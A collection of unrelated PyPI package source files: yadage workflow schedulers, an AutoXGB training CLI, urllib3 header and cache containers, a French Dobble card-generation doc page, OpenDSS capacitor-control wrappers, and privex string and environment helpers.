sphere using the method described in [2]_. If 'mode = 'dd', then we will generate
points using the subproblem decomposition technique used in NBI method
(a.k.a. "Das-Dennis's Approach") discussed in [3]_. Default first when optional.
Other Parameters
----------------
delta : float, optional
`delta` value for normalized LHC, this is used so that we only keep vectors
`V` such that `np.linalg.norm(V, 1) > delta`. The default value is 0.0001 but
you might want to change it according to your application.
Returns
-------
F : ndarray
`n` points on the `m`-sphere, i.e. `|F| = n x m`.
X : ndarray
`n` points of the `m-1` dimensional spherical coordinate values, i.e. `|X| = n x (m-1)`.
References
----------
.. [1] H. Jain and K. Deb, "An Evolutionary Many-Objective Optimization Algorithm Using
Reference-Point Based Nondominated Sorting Approach, Part II: Handling Constraints
and Extending to an Adaptive Approach," in IEEE Transactions on Evolutionary Computation,
vol. 18, no. 4, pp. 602-622, Aug. 2014, doi: 10.1109/TEVC.2013.2281534.
.. [2] Simon C., "Generating uniformly distributed numbers on a sphere," online:
http://corysimon.github.io/articles/uniformdistn-on-sphere/
.. [3] I. Das and J. E. Dennis, "Normal-Boundary Intersection: A New Method for
Generating the Pareto Surface in Nonlinear Multicriteria Optimization Problems,"
SIAM Journal on Optimization, vol. 8, (3), pp. 631-27, 1998.
"""
# This is needed for dtlz2
delta = kwargs['delta'] if (len(kwargs) > 0 and 'delta' in kwargs) else 0.0001
F, X = dtlz2.surface(r=r, n=n, m=m, mode=mode, delta=delta)
F, X, G = get_feasible(F, X)
CV = tr.normalize(G)
return F, X, G, CV
|
PypiClean
|
/yadage-fork-0.11.0.tar.gz/yadage-fork-0.11.0/yadage/handlers/scheduler_handlers.py
|
import logging
import utils
import itertools
import copy
from expression_handlers import handlers as exprhandlers
from yadage.yadagestep import yadagestep, initstep, outputReference
from ..stages import jsonStage
from yadage.helpers import leaf_iterator
log = logging.getLogger(__name__)
handlers, scheduler = utils.handler_decorator()
# A scheduler does the following things:
# - attached new nodes to the DAG
# - for each added step
# - the step is given a name
# - the step attributes are determined using the scheduler spec and context
# - a list of used inputs (in the form of [stepname,outputkey,index])
def select_parameter(wflowview, parameter):
'''
Evaluates parameter expressions (if needed) in the context of a workflow view
:param wflowview: the workflow view on which to evaluete possible value expressions
:param parameter: either a non-dict value or a JSON-like dict for a
supported value expression
:return: the parameter value
'''
if type(parameter) is not dict:
value = parameter
else:
handler = exprhandlers[parameter['expression_type']]
value = handler(wflowview, parameter)
return value
def finalize_value(wflowview, step, value, state):
'''
finalize a value by recursively resolving references and
contextualizing it for the passed state context
:param wflowview: the workflow view against which to resolve upstream references
:param step: the step for which to track usage of upstream references
:param value: the parameter value. May be a output reference, or a JSON value type
:param state: the state context used to contextualize parameter values
:return: finalized parameter value
'''
if type(value) == outputReference:
step.used_input(value)
v = value.pointer.resolve(wflowview.dag.getNode(value.stepid).result)
return finalize_value(wflowview, step, v, state)
if state:
return state.contextualize_data(value)
else:
return value
def finalize_input(wflowview, step, jsondata, state):
'''
evaluate final values of step parameters by either resolving a
reference to a upstream output and contextualizing stateful
parameters. Also tracks usage of upstream references for the step
:param wflowview: the workflow view view against which to resolve any upstream references
:param step: the step that for which to track usage of upstream references
:param jsondata: the prospective step parameters
:param state: the state context
:return: finalized step parameters
'''
result = copy.deepcopy(jsondata)
for leaf_pointer, leaf_value in leaf_iterator(jsondata):
leaf_pointer.set(result,finalize_value(wflowview, step, leaf_value, state))
return result
def step_or_init(name, spec, state_provider):
'''
create a named yadagestep of sub-workflow initstep object based on stage spec
:param name: name of the eventual (init-)step
:param spec: the stage spec
:param state_provider: the stage's state provider
:return: yadage or init step object
'''
if 'step' in spec:
step_state = state_provider.new_state(name)
return yadagestep(name=name, spec=spec['step'], context=step_state)
elif 'workflow' in spec:
return initstep('init {}'.format(name))
def addStepOrWorkflow(name, stage, step, spec):
'''
adds a step or a sub-workflow belonging to a stage this stage init step to the current workflow view
:param str name: the name of the step or sub-workflow
:param stage: the stage from which to use state context and workflow view
:param step: either a yadagestep (for normal workflow steps) initstep object (for sub-workflows)
:param spec: the stage spec
:return: None
'''
if type(step) == initstep:
new_provider = stage.state_provider.new_provider(name)
subrules = [jsonStage(yml, new_provider) for yml in spec['workflow']['stages']]
stage.addWorkflow(subrules, initstep=step)
else:
stage.addStep(step)
def get_parameters(spec):
'''
retrieve parameters from the spec
:param spec: the stage spec
:return: a JSON-like object of stage parameters
'''
return {x['key']: x['value']for x in spec['parameters']}
@scheduler('singlestep-stage')
def singlestep_stage(stage, spec):
'''
a simple state that adds a single step/workflow. The node is attached
to the DAG based on used upstream outputs
:param stage: common stage parent object
:param spec: stage JSON-like spec
:return: None
'''
log.debug('scheduling singlestep stage with spec:\n%s', spec)
step = step_or_init(name=stage.name, spec=spec, state_provider=stage.state_provider)
ctx = step.context if hasattr(step, 'context') else stage.state_provider
parameters = {
k: select_parameter(stage.view, v) for k, v in get_parameters(spec).iteritems()
}
finalized = finalize_input(stage.view, step, parameters, ctx)
addStepOrWorkflow(stage.name, stage, step.s(**finalized), spec)
def scatter(parameters, scatter):
'''
convert a parameter set and scatter definition into a list
of single parameter sets.
:param parameters: the parameter definition
:param scatter: scattering method. One of 'zip' or 'cartesian'
:return: list of parameter sets
'''
commonpars = parameters.copy()
to_scatter = {}
for scatpar in scatter['parameters']:
to_scatter[scatpar] = commonpars.pop(scatpar)
singlesteppars = []
if scatter['method'] == 'zip':
keys, zippable = zip(
*[(k, v) for i, (k, v) in enumerate(to_scatter.iteritems())])
for zipped in zip(*zippable):
individualpars = dict(zip(keys, zipped))
pars = commonpars.copy()
pars.update(**individualpars)
singlesteppars += [pars]
if scatter['method'] == 'cartesian':
for what in itertools.product(*[to_scatter[k] for k in scatter['parameters']]):
individualpars = dict(zip(scatter['parameters'], what))
pars = commonpars.copy()
pars.update(**individualpars)
singlesteppars += [pars]
return singlesteppars
@scheduler('multistep-stage')
def multistep_stage(stage, spec):
'''
a stage that attaches an array of nodes to the DAG. The number of nodes
is determined by a scattering recipe. Currently two algs are supported
- ``zip``: one or more arrays of length n are iterated through in lock-step.
n nodes are added to the DAG where the parameters values are set to
the values in the iteration
- ``cartesian``: a cartesian product of a number of arrays (possibly different sizes)
adds n1 x n2 x ... nj nodes.
Nodes are attached to the DAG based on used upstream inputs
:param stage: common stage parent object
:param spec: stage JSON-like spec
:return: None
'''
log.debug('scheduling multistep stage with spec:\n%s', spec)
parameters = {
k: select_parameter(stage.view, v) for k, v in get_parameters(spec).iteritems()
}
singlesteppars = scatter(parameters, spec['scatter'])
for i, pars in enumerate(singlesteppars):
singlename = '{}_{}'.format(stage.name, i)
step = step_or_init(name=singlename, spec=spec, state_provider = stage.state_provider)
ctx = step.context if hasattr(step, 'context') else None
finalized = finalize_input(stage.view, step, pars, ctx)
addStepOrWorkflow(singlename, stage, step.s(**finalized), spec)
|
PypiClean
|
/autoxgbAUC-2.1.0.tar.gz/autoxgbAUC-2.1.0/src/xgbauto/cli/train.py
|
from argparse import ArgumentParser
from ..autoxgb import AutoXGB
from ..enums import TaskType
from . import BaseCommand
def train_autoxgb_command_factory(args):
return TrainAutoXGBCommand(
args.train_filename,
args.idx,
args.targets,
args.task,
args.output,
args.features,
args.num_folds,
args.use_gpu,
args.seed,
args.test_filename,
args.time_limit,
args.fast,
)
class TrainAutoXGBCommand(BaseCommand):
@staticmethod
def register_subcommand(parser: ArgumentParser):
_parser = parser.add_parser("train", help="Train a new model using AutoXGB")
_parser.add_argument(
"--train_filename",
help="Path to training file",
required=True,
type=str,
)
_parser.add_argument(
"--test_filename",
help="Path to test file",
required=False,
type=str,
default=None,
)
_parser.add_argument(
"--output",
help="Path to output directory",
required=True,
type=str,
)
_parser.add_argument(
"--task",
help="User defined task type",
required=False,
type=str,
default=None,
choices=TaskType.list_str(),
)
_parser.add_argument(
"--idx",
help="ID column",
required=False,
type=str,
default="id",
)
_parser.add_argument(
"--targets",
help="Target column(s). If there are multiple targets, separate by ';'",
required=False,
type=str,
default="target",
)
_parser.add_argument(
"--num_folds",
help="Number of folds to use",
required=False,
type=int,
default=5,
)
_parser.add_argument(
"--features",
help="Features to use, separated by ';'",
required=False,
type=str,
default=None,
)
_parser.add_argument(
"--use_gpu",
help="Whether to use GPU for training",
action="store_true",
required=False,
)
_parser.add_argument(
"--fast",
help="Whether to use fast mode for tuning params. Only one fold will be used if fast mode is set",
action="store_true",
required=False,
)
_parser.add_argument(
"--seed",
help="Random seed",
required=False,
type=int,
default=42,
)
_parser.add_argument(
"--time_limit",
help="Time limit for optimization",
required=False,
type=int,
default=None,
)
_parser.set_defaults(func=train_autoxgb_command_factory)
def __init__(
self,
train_filename,
idx,
targets,
task,
output,
features,
num_folds,
use_gpu,
seed,
test_filename,
time_limit,
fast,
):
self.train_filename = train_filename
self.idx = idx
self.targets = targets.split(";")
self.task = task
self.output = output
self.features = features.split(";") if features else None
self.num_folds = num_folds
self.use_gpu = use_gpu
self.seed = seed
self.test_filename = test_filename
self.time_limit = time_limit
self.fast = fast
def execute(self):
axgb = AutoXGB(
train_filename=self.train_filename,
idx=self.idx,
targets=self.targets,
task=self.task,
output=self.output,
features=self.features,
num_folds=self.num_folds,
use_gpu=self.use_gpu,
seed=self.seed,
test_filename=self.test_filename,
time_limit=self.time_limit,
fast=self.fast,
)
axgb.train()
|
PypiClean
|
/yieldfrom.urllib3-0.1.4.zip/yieldfrom.urllib3-0.1.4/yieldfrom/urllib3/_collections.py
|
from collections import Mapping, MutableMapping
try:
from threading import RLock
except ImportError: # Platform-specific: No threads available
class RLock:
def __enter__(self):
pass
def __exit__(self, exc_type, exc_value, traceback):
pass
try: # Python 2.7+
from collections import OrderedDict
except ImportError:
from .packages.ordered_dict import OrderedDict
from .packages.six import itervalues
__all__ = ['RecentlyUsedContainer', 'HTTPHeaderDict']
_Null = object()
class RecentlyUsedContainer(MutableMapping):
"""
Provides a thread-safe dict-like container which maintains up to
``maxsize`` keys while throwing away the least-recently-used keys beyond
``maxsize``.
:param maxsize:
Maximum number of recent elements to retain.
:param dispose_func:
Every time an item is evicted from the container,
``dispose_func(value)`` is called. Callback which will get called
"""
ContainerCls = OrderedDict
def __init__(self, maxsize=10, dispose_func=None):
self._maxsize = maxsize
self.dispose_func = dispose_func
self._container = self.ContainerCls()
self.lock = RLock()
def __getitem__(self, key):
# Re-insert the item, moving it to the end of the eviction line.
with self.lock:
item = self._container.pop(key)
self._container[key] = item
return item
def __setitem__(self, key, value):
evicted_value = _Null
with self.lock:
# Possibly evict the existing value of 'key'
evicted_value = self._container.get(key, _Null)
self._container[key] = value
# If we didn't evict an existing value, we might have to evict the
# least recently used item from the beginning of the container.
if len(self._container) > self._maxsize:
_key, evicted_value = self._container.popitem(last=False)
if self.dispose_func and evicted_value is not _Null:
self.dispose_func(evicted_value)
def __delitem__(self, key):
with self.lock:
value = self._container.pop(key)
if self.dispose_func:
self.dispose_func(value)
def __len__(self):
with self.lock:
return len(self._container)
def __iter__(self):
raise NotImplementedError('Iteration over this class is unlikely to be threadsafe.')
def clear(self):
with self.lock:
# Copy pointers to all values, then wipe the mapping
# under Python 2, this copies the list of values twice :-|
values = list(self._container.values())
self._container.clear()
if self.dispose_func:
for value in values:
self.dispose_func(value)
def keys(self):
with self.lock:
return self._container.keys()
class HTTPHeaderDict(MutableMapping):
"""
:param headers:
An iterable of field-value pairs. Must not contain multiple field names
when compared case-insensitively.
:param kwargs:
Additional field-value pairs to pass in to ``dict.update``.
A ``dict`` like container for storing HTTP Headers.
Field names are stored and compared case-insensitively in compliance with
RFC 7230. Iteration provides the first case-sensitive key seen for each
case-insensitive pair.
Using ``__setitem__`` syntax overwrites fields that compare equal
case-insensitively in order to maintain ``dict``'s api. For fields that
compare equal, instead create a new ``HTTPHeaderDict`` and use ``.add``
in a loop.
If multiple fields that are equal case-insensitively are passed to the
constructor or ``.update``, the behavior is undefined and some will be
lost.
>>> headers = HTTPHeaderDict()
>>> headers.add('Set-Cookie', 'foo=bar')
>>> headers.add('set-cookie', 'baz=quxx')
>>> headers['content-length'] = '7'
>>> headers['SET-cookie']
'foo=bar, baz=quxx'
>>> headers['Content-Length']
'7'
If you want to access the raw headers with their original casing
for debugging purposes you can access the private ``._data`` attribute
which is a normal python ``dict`` that maps the case-insensitive key to a
list of tuples stored as (case-sensitive-original-name, value). Using the
structure from above as our example:
>>> headers._data
{'set-cookie': [('Set-Cookie', 'foo=bar'), ('set-cookie', 'baz=quxx')],
'content-length': [('content-length', '7')]}
"""
def __init__(self, headers=None, **kwargs):
self._data = {}
if headers is None:
headers = {}
self.update(headers, **kwargs)
def add(self, key, value):
"""Adds a (name, value) pair, doesn't overwrite the value if it already
exists.
>>> headers = HTTPHeaderDict(foo='bar')
>>> headers.add('Foo', 'baz')
>>> headers['foo']
'bar, baz'
"""
self._data.setdefault(key.lower(), []).append((key, value))
def getlist(self, key):
"""Returns a list of all the values for the named field. Returns an
empty list if the key doesn't exist."""
return self[key].split(', ') if key in self else []
def copy(self):
h = HTTPHeaderDict()
for key in self._data:
for rawkey, value in self._data[key]:
h.add(rawkey, value)
return h
def __eq__(self, other):
if not isinstance(other, Mapping):
return False
other = HTTPHeaderDict(other)
return dict((k1, self[k1]) for k1 in self._data) == \
dict((k2, other[k2]) for k2 in other._data)
def __getitem__(self, key):
values = self._data[key.lower()]
return ', '.join(value[1] for value in values)
def __setitem__(self, key, value):
self._data[key.lower()] = [(key, value)]
def __delitem__(self, key):
del self._data[key.lower()]
def __len__(self):
return len(self._data)
def __iter__(self):
for headers in itervalues(self._data):
yield headers[0][0]
def __repr__(self):
return '%s(%r)' % (self.__class__.__name__, dict(self.items()))
|
PypiClean
|
/Jouets-0.2.0.tar.gz/Jouets-0.2.0/doc/dobble.rst
|
..
Copyright 2014-2015 Louis Paternault
Cette œuvre de Louis Paternault est mise à disposition selon les termes de
la licence Creative Commons Attribution - Partage dans les Mêmes Conditions
4.0 International (CC-BY-SA). Le texte complet de la licence est disponible
à l'adresse : http://creativecommons.org/licenses/by-sa/4.0/deed.fr
************************************************
`dobble` — Création de jeu de cartes de *Dobble*
************************************************
Le `Dobble <http://www.asmodee.com/ressources/jeux_versions/dobble.php>`__ est
un jeu de société de rapitidé, dont les règles s'expliquent en moins de vingt
secondes (sans exagérer). Il se compose de 55 cartes comportant chacune huit
symboles, ayant la particularité suivante : deux cartes quelconques ont
exactement un symbole en commun (ni plus ni moins).
La question qui se pose immédiatement est : comment créer un tel jeu de
cartes ? L'analyse mathématique, et la description de l'algorithme, sont
proposés dans la partie :ref:`dobble_math`.
Ce programme permet de générer des jeux de cartes, de taille arbitrairement
grande (mais pas arbitraire pour autant), et de vérifier qu'un jeu donné est
correct.
Table des matières
------------------
La première partie :ref:`dobble_math` propose une analyse mathématique du jeu,
ainsi qu'une description et preuve de l'algorthme. La seconde partie
:ref:`dobble_variantes` contient l'analyse mathématique de deux variantes
possibles à ce jeu. La dernière, :ref:`dobble_usage`, enfin, décrit
l'utilisation du programme en lui-même.
.. toctree::
:maxdepth: 2
:numbered:
dobble/math
dobble/variantes
dobble/usage
Autres analyses
---------------
L'analyse semblant faire référence sur internet est proposée par le Maxime
Bourrigan (du CNRS) : `Dobble et la géométrie finie
<http://images.math.cnrs.fr/Dobble-et-la-geometrie-finie.html>`_. Dans cet
article, l'auteur utilise une approche géométrique pour étudier ce jeu, mais
sans proposer d'algorithme pour générer de jeu.
Bourrigan apporte une information très intéressante concernant ce genre de
problèmes : l'ensemble des configurations possibles est mal connu, et
l'existence d'un jeu à 157 cartes (ayant chacune 13 symboles) est un problème
ouvert.
Notre proposition, quant à elle, utilise une approche arithmétique. Je ne suis
pas le premier à découvrir la méthode que je propose ici : une rapide recherche
de `math dobble` sur votre moteur de recherche préféré vous donnera d'autres
exemples. Les cas de découvertes simultanées sont monnaie courante en sciences,
et je suppose que l'aspect mathématique de ce jeu a été perçu par de nombreux
joueurs, qui ont alors joué à en étudier les propriétés.
|
PypiClean
|
/py_dss_interface-2.0.2-py3-none-any.whl/py_dss_interface/models/CapControls/CapControls.py
|
from typing import List
from py_dss_interface.models.CapControls.CapControlsF import CapControlsF
from py_dss_interface.models.CapControls.CapControlsI import CapControlsI
from py_dss_interface.models.CapControls.CapControlsS import CapControlsS
from py_dss_interface.models.CapControls.CapControlsV import CapControlsV
class CapControls(CapControlsF, CapControlsI, CapControlsS, CapControlsV):
"""
This interface implements the CapControls (ICapControls) interface of OpenDSS by declaring 4 procedures for
accessing the different properties included in this interface: CapControlsF, CapControlsI, CapControlsS,
CapControlsV
"""
def __init__(self, obj_dss):
super().__init__(obj_dss)
@property
def mode(self) -> int:
"""Gets the type of automatic controller (see manual for details).
CURRENTCONTROL: Result := 0;
VOLTAGECONTROL: Result := 1;
VARCONTROL: Result := 2;
TIMECONTROL: Result := 3;
PFCONTROL: Result := 4;
USERCONTROL: Result := 4;
Sets the type of automatic controller (see manual for details).
0: elem.CapControlType := CURRENTCONTROL;
1: elem.CapControlType := VOLTAGECONTROL;
2: elem.CapControlType := KVARCONTROL;
3: elem.CapControlType := TIMECONTROL;
4: elem.CapControlType := PFCONTROL;
"""
return CapControlsI._mode(self)
@mode.setter
def mode(self, argument: int):
CapControlsI._mode_write(self, argument)
@property
def monitored_term(self) -> int:
"""Gets the terminal number on the element that PT and CT are connected to.
Sets the terminal number on the element that PT and CT are connected to. There is not a explicit return
type in the oficial documentation, because of this we choose not put a explicit return too. """
return CapControlsI._monitored_term(self)
@monitored_term.setter
def monitored_term(self, values):
dss, argument = values
CapControlsI._monitored_term_write(self, dss, argument)
@property
def use_volt_override(self) -> int:
"""Gets if Vmin and Vmax are enabled to override the control Mode. There is not a explicit return type in the
oficial documentation, because of this we choose not put a explicit return too.
Sets if enables Vmin and Vmax to override the control Mode. There is not a explicit return type in the
oficial documentation, because of this we choose not put a explicit return too. """
return CapControlsI._use_volt_override(self)
@use_volt_override.setter
def use_volt_override(self, values):
dss, argument = values
CapControlsI._use_volt_override_write(self, dss, argument)
@property
def count(self) -> int:
"""Gets the number of CapControls in Active Circuit."""
return CapControlsI._count(self)
@property
def names(self) -> List[str]:
"""Gets a variant array of string with all CapControl names."""
return CapControlsV._names(self)
@property
def ct_ratio(self) -> float:
"""Gets the transducer ratio current to control current.
Sets the transducer ratio current to control current."""
return CapControlsF._ct_ratio(self)
@ct_ratio.setter
def ct_ratio(self, argument: float):
CapControlsF._ct_ratio_write(self, argument)
@property
def pt_ratio(self) -> float:
return CapControlsF._pt_ratio(self)
@pt_ratio.setter
def pt_ratio(self, argument: float):
"""Gets the transducer ratio from primary feeder to control voltage.
Sets the transducer ratio from primary feeder to control voltage."""
CapControlsF._pt_ratio_write(self, argument)
@property
def on_setting(self) -> float:
"""Gets the threshold to arm or switch on a step. See Mode for Units.
Sets the threshold to arm or switch on a step. See Mode for Units."""
return CapControlsF._on_setting(self)
@on_setting.setter
def on_setting(self, argument: float):
CapControlsF._on_setting_write(self, argument)
@property
def off_setting(self) -> float:
return CapControlsF._off_setting(self)
@off_setting.setter
def off_setting(self, argument: float):
"""Gets the threshold to switch off a step. See Mode for Units.
Sets the threshold to switch off a step. See Mode for Units."""
CapControlsF._off_setting_write(self, argument)
@property
def vmax(self) -> float:
"""Gets the Vmax, this reference with VoltOverride, switch off whenever PT voltage exceeds this level.
Sets the Vmax, this reference with VoltOverride, switch off whenever PT voltage exceeds this level."""
return CapControlsF._vmax(self)
@vmax.setter
def vmax(self, argument: float):
CapControlsF._vmax_write(self, argument)
@property
def vmin(self) -> float:
"""Gets the Vmin, this reference with VoltOverride, switch ON whenever PT voltage drops below this level.
Sets the Vmin, this reference with VoltOverride, switch ON whenever PT voltage drops below this level."""
return CapControlsF._vmin(self)
@vmin.setter
def vmin(self, argument: float):
CapControlsF._vmin_write(self, argument)
@property
def delay(self) -> float:
"""Gets the time delay [s] to switch on after arming. Control may reset before actually switching.
Sets the time delay [s] to switch on after arming. Control may reset before actually switching."""
return CapControlsF._delay(self)
@delay.setter
def delay(self, argument: float):
CapControlsF._delay_write(self, argument)
@property
def delay_off(self) -> float:
"""Gets the time delay [s] before switching off a step. Control may reset before actually switching.
Sets the time delay [s] before switching off a step. Control may reset before actually switching."""
return CapControlsF._delay_off(self)
@delay_off.setter
def delay_off(self, argument: float):
CapControlsF._delay_off_write(self, argument)
@property
def dead_time(self) -> float:
"""Gets the time delay [s] after switching off a step. Control may reset before actually switching.
Sets the time delay [s] after switching off a step. Control may reset before actually switching.."""
return CapControlsF._dead_time(self)
@dead_time.setter
def dead_time(self, argument: float):
CapControlsF._dead_time_write(self, argument)
@property
def name(self) -> str:
"""Gets the name of the active CapControl.
Sets a CapControl active by name."""
return CapControlsS._name(self)
@name.setter
def name(self, argument: str):
CapControlsS._name_write(self, argument)
@property
def controlled_capacitor(self) -> str:
"""Gets the name of the capacitor that is controlled.
Sets the name of the capacitor that is controlled."""
return CapControlsS._controlled_capacitor(self)
@controlled_capacitor.setter
def controlled_capacitor(self, argument: str):
CapControlsS._controlled_capacitor_write(self, argument)
@property
def monitored_object(self) -> str:
"""Gets the full name of the element that PT and CT are connected to.
Sets the full name of the element that PT and CT are connected to."""
return CapControlsS._monitored_object(self)
@monitored_object.setter
def monitored_object(self, argument: str):
CapControlsS._monitored_object_write(self, argument)
def first(self) -> int:
"""Sets the first CapControl active. Returns 0 if no more."""
return CapControlsI._first(self)
def next(self) -> int:
"""Sets the next CapControl active. Returns 0 if no more."""
return CapControlsI._next(self)
|
PypiClean
|
/privex_helpers-3.2.1-py3-none-any.whl/privex/helpers/common.py
|
import inspect
import math
import os
import random
import re
import shlex
import string
import argparse
import logging
import subprocess
import sys
from collections import OrderedDict
from decimal import Decimal, getcontext
from os import getenv as env
from subprocess import PIPE, STDOUT
from typing import Callable, Sequence, List, Union, Tuple, Type, Dict, Any, Iterable, Optional, BinaryIO, Generator, Mapping
from privex.helpers import settings
from privex.helpers.collections import DictObject, OrderedDictObject
from privex.helpers.types import T, K, V, C, USE_ORIG_VAR, STRBYTES, NumberStr
from privex.helpers.exceptions import NestedContextException
log = logging.getLogger(__name__)
SAFE_CHARS = 'abcdefhkmnprstwxyz23456789ACDEFGHJKLMNPRSTWXYZ'
"""Characters that shouldn't be mistaken, avoiding users confusing an o with a 0 or an l with a 1 or I"""
ALPHANUM = string.ascii_uppercase + string.digits + string.ascii_lowercase
"""All characters from a-z, A-Z, and 0-9 - for random strings where there's no risk of user font confusion"""
def random_str(size: int = 50, chars: Sequence = SAFE_CHARS) -> str:
"""
Generate a random string of arbitrary length using a given character set (string / list / tuple). Uses Python's
SystemRandom class to provide relatively secure randomness from the OS. (On Linux, uses /dev/urandom)
By default, uses the character set :py:attr:`.SAFE_CHARS` which contains letters a-z / A-Z and numbers 2-9
with commonly misread characters removed (such as ``1``, ``l``, ``L``, ``0`` and ``o``). Pass
:py:attr:`.ALPHANUM` as `chars` if you need the full set of upper/lowercase + numbers.
Usage:
>>> from privex.helpers import random_str
>>> # Default random string - 50 character alphanum without easily mistaken chars
>>> password = random_str()
'MrCWLYMYtT9A7bHc5ZNE4hn7PxHPmsWaT9GpfCkmZASK7ApN8r'
>>> # Customised random string - 12 characters using only the characters `abcdef12345`
>>> custom = random_str(12, chars='abcdef12345')
'aba4cc14a43d'
Warning: As this relies on the OS's entropy features, it may not be cryptographically secure on non-Linux platforms:
> The returned data should be unpredictable enough for cryptographic applications, though its exact quality
> depends on the OS implementation.
:param int size: Length of random string to generate (default 50 characters)
:param str chars: Characterset to generate with ( default is :py:attr:`.SAFE_CHARS` - a-z/A-Z/0-9 with
often misread chars removed)
"""
return ''.join(random.SystemRandom().choice(chars) for _ in range(size))
def empty(v, zero: bool = False, itr: bool = False) -> bool:
"""
Quickly check if a variable is empty or not. By default only '' and None are checked, use ``itr`` and ``zero`` to
test for empty iterable's and zeroed variables.
Returns ``True`` if a variable is ``None`` or ``''``, returns ``False`` if variable passes the tests
Example usage:
>>> x, y = [], None
>>> if empty(y):
... print('Var y is None or a blank string')
...
>>> if empty(x, itr=True):
... print('Var x is None, blank string, or an empty dict/list/iterable')
:param v: The variable to check if it's empty
:param zero: if ``zero=True``, then return ``True`` if the variable is int ``0`` or str ``'0'``
:param itr: if ``itr=True``, then return ``True`` if the variable is ``[]``, ``{}``, or is an iterable and has 0 length
:return bool is_blank: ``True`` if a variable is blank (``None``, ``''``, ``0``, ``[]`` etc.)
:return bool is_blank: ``False`` if a variable has content (or couldn't be checked properly)
"""
_check = [None, '']
if zero: _check += [0, '0']
if v in _check: return True
if itr:
if v == [] or v == {}: return True
if hasattr(v, '__len__') and len(v) == 0: return True
return False
def empty_if(v: V, is_empty: K = None, not_empty: T = USE_ORIG_VAR, **kwargs) -> Union[T, K, V]:
"""
Syntactic sugar for ``x if empty(y) else z``. If ``not_empty`` isn't specified, then the original value ``v``
will be returned if it's not empty.
**Example 1**::
>>> def some_func(name=None):
... name = empty_if(name, 'John Doe')
... return name
>>> some_func("")
John Doe
>>> some_func("Dave")
Dave
**Example 2**::
>>> empty_if(None, 'is empty', 'is not empty')
is empty
>>> empty_if(12345, 'is empty', 'is not empty')
is not empty
:param Any v: The value to test for emptiness
:param is_empty: The value to return if ``v`` is empty (defaults to ``None``)
:param not_empty: The value to return if ``v`` is not empty (defaults to the original value ``v``)
:param kwargs: Any additional kwargs to pass to :func:`.empty`
:key zero: if ``zero=True``, then v is empty if it's int ``0`` or str ``'0'``
:key itr: if ``itr=True``, then v is empty if it's ``[]``, ``{}``, or is an iterable and has 0 length
:return V orig_var: The original value ``v`` is returned if ``not_empty`` isn't specified.
:return K is_empty: The value specified as ``is_empty`` is returned if ``v`` is empty
:return T not_empty: The value specified as ``not_empty`` is returned if ``v`` is not empty
(and not_empty was specified)
"""
not_empty = v if not_empty == USE_ORIG_VAR else not_empty
return is_empty if empty(v, **kwargs) else not_empty
def is_true(v) -> bool:
"""
Check if a given bool/str/int value is some form of ``True``:
* **bool**: ``True``
* **str**: ``'true'``, ``'yes'``, ``'y'``, ``'1'``
* **int**: ``1``
(note: strings are automatically .lower()'d)
Usage:
>>> is_true('true')
True
>>> is_true('no')
False
:param Any v: The value to check for truthfulness
:return bool is_true: ``True`` if the value appears to be truthy, otherwise ``False``.
"""
v = v.lower() if type(v) is str else v
return v in [True, 'true', 'yes', 'y', '1', 1]
def is_false(v, chk_none: bool = True) -> bool:
"""
**Warning:** Unless you specifically need to verify a value is Falsey, it's usually safer to
check for truth :py:func:`.is_true` and invert the result, i.e. ``if not is_true(v)``
Check if a given bool/str/int value is some form of ``False``:
* **bool**: ``False``
* **str**: ``'false'``, ``'no'``, ``'n'``, ``'0'``
* **int**: ``0``
If ``chk_none`` is True (default), will also consider the below values to be Falsey::
boolean: None // string: 'null', 'none', ''
(note: strings are automatically .lower()'d)
Usage:
>>> is_false(0)
True
>>> is_false('yes')
False
:param Any v: The value to check for falseyness
:param bool chk_none: If ``True``, treat ``None``/``'none'``/``'null'`` as Falsey (default ``True``)
:return bool is_False: ``True`` if the value appears to be falsey, otherwise ``False``.
"""
v = v.lower() if type(v) is str else v
chk = [False, 'false', 'no', 'n', '0', 0]
chk += [None, 'none', 'null', ''] if chk_none else []
return v in chk
def parse_keyval(line: str, valsplit: str = ':', csvsplit=',') -> List[Tuple[str, str]]:
"""
Parses a csv with key:value pairs such as::
John Alex:Doe,Jane Sarah:Doe
Into a list with tuple pairs (can be easily converted to a dict)::
[
('John Alex', 'Doe'),
('Jane Sarah', 'Doe')
]
By default, uses a colons ``:`` to split the key/value, and commas ``,`` to terminate the end of
each keyval pair. This can be overridden by changing valsplit/csvsplit.
:param str line: A string of key:value pairs separated by commas e.g. ``John Alex:Doe,Jane Sarah:Doe``
:param str valsplit: A character (or several) used to split the key from the value (default: colon ``:``)
:param str csvsplit: A character (or several) used to terminate each keyval pair (default: comma ``,``)
:return List[Tuple[str,str]] parsed_data: A list of (key, value) tuples that can easily be casted to a dict()
"""
cs, vs = csvsplit, valsplit
line = [tuple(a.split(vs)) for a in line.split(cs)] if line != '' else []
return [(a.strip(), b.strip()) for a, b in line]
def parse_csv(line: str, csvsplit: str = ',') -> List[str]:
"""
Quick n' dirty parsing of a simple comma separated line, with automatic whitespace stripping
of both the ``line`` itself, and the values within the commas.
Example:
>>> parse_csv(' hello , world, test')
['hello', 'world', 'test']
>>> parse_csv(' world ; test ; example', csvsplit=';')
['world', 'test', 'example']
:param str line: A string of columns separated by commas e.g. ``hello,world,foo``
:param str csvsplit: A character (or several) used to terminate each value in the list. Default: comma ``,``
"""
return [x.strip() for x in line.strip().split(csvsplit)]
def env_csv(env_key: str, env_default=None, csvsplit=',') -> List[str]:
"""
Quick n' dirty parsing of simple CSV formatted environment variables, with fallback
to user specified ``env_default`` (defaults to None)
Example:
>>> import os
>>> os.environ['EXAMPLE'] = ' hello , world, test')
>>> env_csv('EXAMPLE', [])
['hello', 'world', 'test']
>>> env_csv('NONEXISTANT', [])
[]
:param str env_key: Environment var to attempt to load
:param any env_default: Fallback value if the env var is empty / not set (Default: None)
:param str csvsplit: A character (or several) used to terminate each value in the list. Default: comma ``,``
:return List[str] parsed_data: A list of str values parsed from the env var
"""
d = env(env_key)
return env_default if empty(d) else parse_csv(d, csvsplit=csvsplit)
def env_keyval(env_key: str, env_default=None, valsplit=':', csvsplit=',') -> List[Tuple[str, str]]:
"""
Parses an environment variable containing ``key:val,key:val`` into a list of tuples [(key,val), (key,val)]
See :py:meth:`parse_keyval`
:param str env_key: Environment var to attempt to load
:param any env_default: Fallback value if the env var is empty / not set (Default: None)
:param str valsplit: A character (or several) used to split the key from the value (default: colon ``:``)
:param str csvsplit: A character (or several) used to terminate each keyval pair (default: comma ``,``)
"""
d = env(env_key)
return env_default if empty(d) else parse_keyval(d, valsplit=valsplit, csvsplit=csvsplit)
